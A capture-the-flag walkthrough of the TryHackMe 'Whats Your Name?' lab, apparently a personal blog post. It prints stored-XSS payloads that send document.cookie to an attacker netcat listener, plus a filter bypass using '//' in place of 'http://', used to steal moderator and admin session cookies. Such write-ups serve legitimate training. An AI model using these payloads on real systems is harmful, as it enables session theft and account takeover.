THM - Whats Your Name? | walkthrough [TryHackMe machine]

TryHackMe - Whats Your Name? writeup

Published on April 28, 2024 by logoseq

Walkthrough

Summary:

In this challenge I managed to get the moderator and admin's cookie via XSS/CSRF. I added worldwap.thm domain to our /etc/hosts file. In jected the XSS into the name form and admin's chat.

Foothold:

I added worldwap.thm to '/etc/hosts' file as specified in the description, the did a fast nmap scan:

logoseq@kali$ nmap -sC -sV -v -oN nmap_initial -T 3 worldwap.thm
  22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu
    |_Requested resource was /public/html/
  80/tcp   open  http    Apache httpd 2.4.41
  8081/tcp open  http    Apache httpd 2.4.41

I opened the web page and found a registration page, I fill up the form and sent it:

After the registration I was sent to http://worldwap.thm/public/html/login.php where the was a message saying that a subdomain was present: login.worldwap.thm, I added it to /etc/hosts file

/login.php page, there is a subdomain wrote: login.worldwap.thm

I opened it and was the same page as the one found running at port 8081.

Exploitation:

I tried to send some XSS (Cross-site scripting) and found one in http://worldwap.thm/public/html/register.php #name field.

    # my machine (tun0 IP: 10.11.12.13)
    logoseq@kali:$ nc -lvnp 4444

    # payload to be sent in html form into 'name' parameter
    <script>var i=new Image(); i.src="http://10.11.12.13:4444/?cookie="+document.cookie;</script>

I opened the chrome dev tools and changed my cookie to moderator's cookie then I opened "/dashboard.php" which I found earlier via content discovery, but the only feature available there was disabled. Then I decided to go to login.worldwap.thm and use the same cookie then refreshed the page and got the flag from "/profile.php". moderator's login.worldwap.thm/profile.php page, there is the first flag

Then I went to "Go to Chat" page ( /chat.php ) and found that I can chat with the admin, I tried to send the same XSS payload (changed only the port to 4446) but it didn't work, there was a WAF or something else that added " <a href= " probably because of "http://" in the payload.

testing for XSS payloads in the /chat.php while chatting with admin

I asked ChatGPT for an alternative way and found that "http://" can be changed to "//", and now it worked!

  # payload to be sent as POST request in html form '/chat.php' into 'message' parameter
  <script>var i=new Image(); i.src="//10.14.65.0:4446/?cookie="+document.cookie;</script>

XSS payload worked in the chat with admin

I got a new request to my netcat listener on port 4446but it was my cookie because the page reloaded, I closed the netcat listener and opened it again. After few seconds I received the admin's cookie.

netcat request from victim's machine, there is the admin's cookie in the request

I changed the cookie again and went to /profile.php page, there was the admin's flag.

...